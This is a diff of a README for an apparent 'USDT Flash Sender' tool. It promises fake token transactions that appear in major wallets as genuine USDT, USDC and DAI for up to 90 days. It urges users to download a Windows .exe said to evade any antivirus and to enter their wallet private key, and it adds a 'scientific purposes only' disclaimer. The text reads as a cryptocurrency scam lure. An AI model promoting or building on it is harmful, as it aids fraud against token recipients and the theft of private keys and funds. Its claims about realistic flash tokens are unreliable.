ethflasher/ETH-Flasher-USDT/README.md

 🔥 **Key Features:**

 ⚡ **Instant Confirmation**: No delays—immediate visibility in wallets.
-💰 **Realism**: Transactions appear as genuine USDT, USDC, DAI in wallets (Trust, Exodus, Binance, Coinbase).
+💰 **Realism**: Transactions appear as genuine USDT, USDC, DAI in wallets (Trust, Exodus, Binance, Coinbase) valid in wallet up to 90 days 🚀.
 🔒 **User-Friendly**: Simple to use for both beginners and professionals.

-🚀 **How to Use USDT Flash Sender:**

-1. **Download**: Securely install the .exe file on your Windows device.
-Made on Python - working with any Antivirus 🔥
-2. **Run**: Access the intuitive, easy-to-use interface.

 ⚠️ IMPORTANT⚠️

-Private key (not seed phrase)🔑 is the key to your wallet, which contains the necessary balance of Ether (ETH) 💰 to pay for the gas fees ⛽ of the transaction.
+Private key (not seed phrase) 🔑 is the key to your wallet, which contains the necessary balance of Ether (ETH) 💰 to pay for the gas fees ⛽ of the transaction.

-Delivery address 📬 is the address where you want to send the flash tokens 💸.
+Delivery address 📬 is the address where you want to send the FLASH tokens 💸.

-4. **Send USDT**: Enter wallet addresses, specify amounts, and execute instant transactions!

-⚠️ **Important Note**: The software is intended for **scientific purposes only**.
+The software is intended for **scientific purposes only**.
 Usage for any illegal activities is strictly prohibited.

 ---